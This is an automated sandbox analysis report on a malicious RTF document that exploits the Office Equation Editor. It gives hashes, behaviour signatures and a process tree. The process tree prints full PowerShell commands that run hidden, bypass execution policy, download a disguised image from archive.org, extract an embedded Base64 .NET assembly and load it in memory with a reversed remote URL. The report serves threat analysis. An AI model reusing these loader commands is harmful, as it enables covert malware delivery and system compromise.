Analysis

  • max time kernel
    149s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    08-09-2024 02:04

General

  • Target

    d9847123b526161e5454f0b6ba07218041ccc47e15171972c3d04d681a1bfba0.rtf

  • Size

    81KB

  • MD5

    afb14dcb82dbb041183e8d492c415a13

  • SHA1

    6e75ff4e6d06c9824d9a9b50061d22c21f7d659f

  • SHA256

    d9847123b526161e5454f0b6ba07218041ccc47e15171972c3d04d681a1bfba0

  • SHA512

    f5adb4a97c5d6bc8a8102c70b2bc3f4b05bc5ea1acbeae6457d654510d46cbeb3018880e64c487ebeaee89978827871f951e025220bed25bbddfb1ae5b6e0ac8

  • SSDEEP

    384:Ghvwphf2vHXsv6kBBZK9llGuaPJ4QmwhzofOQT6pLcdYa9eyDAPI/uVOP8d465Q7:Ghxv8LB0MJwwSfOQOO1eyDAA/kdJg

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://archive.org/download/new_image_vbs/new_image_vbs.jpg

exe.dropper

https://archive.org/download/new_image_vbs/new_image_vbs.jpg

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell and hides the display window.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 62 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d9847123b526161e5454f0b6ba07218041ccc47e15171972c3d04d681a1bfba0.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\SysWOW64\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe"
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2940
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\cutebabygirlwantmetosweetnam.vBS"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated Base64 string removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⚕ ⛈ ㎯ ⮎ ⍓','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1860
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.LLONR/911/01.4.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:876

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b56e6993dd117ca471528c4e14427c8f

    SHA1

    5db98af17a33f065478a08f5e7201b3fac57259d

    SHA256

    7f2123b45e5c59a16a3509680d1721fe5bf2a60812e4b369ac71b1c480d01020

    SHA512

    ed872ec0d233a0facad438bf389187f32a9685226dcdb2fb94e8a5dac7db8ba666ecb453a4360d85fb45feb411f2a0b8fea86b9f679eabcc69466b950ca29b00

  • C:\Users\Admin\AppData\Roaming\cutebabygirlwantmetosweetnam.vBS

    Filesize

    190KB

    MD5

    44ae01e9018c47c3ed86735fbc3111df

    SHA1

    4ffcf8bcaea8c9d4b675c33e81a748589267686e

    SHA256

    5e748dbcb37f5de5f010fb7378fe7f973db532d3248c1c0f13d034865866b0c5

    SHA512

    8bce36f2b816a94a5131a2964432c40ade7bdc5656735dd0697aacf98a546e59a3c6b0124fbb0f23397af7bbd26519fceadd447089b1a422c7eed1d972d3f9cf

  • memory/876-20-0x00000000056D0000-0x0000000005728000-memory.dmp

    Filesize

    352KB

  • memory/876-21-0x0000000002DC0000-0x0000000002E0F000-memory.dmp

    Filesize

    316KB

  • memory/2892-0-0x000000002F6B1000-0x000000002F6B2000-memory.dmp

    Filesize

    4KB

  • memory/2892-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2892-2-0x00000000712CD000-0x00000000712D8000-memory.dmp

    Filesize

    44KB

  • memory/2892-4-0x00000000712CD000-0x00000000712D8000-memory.dmp

    Filesize

    44KB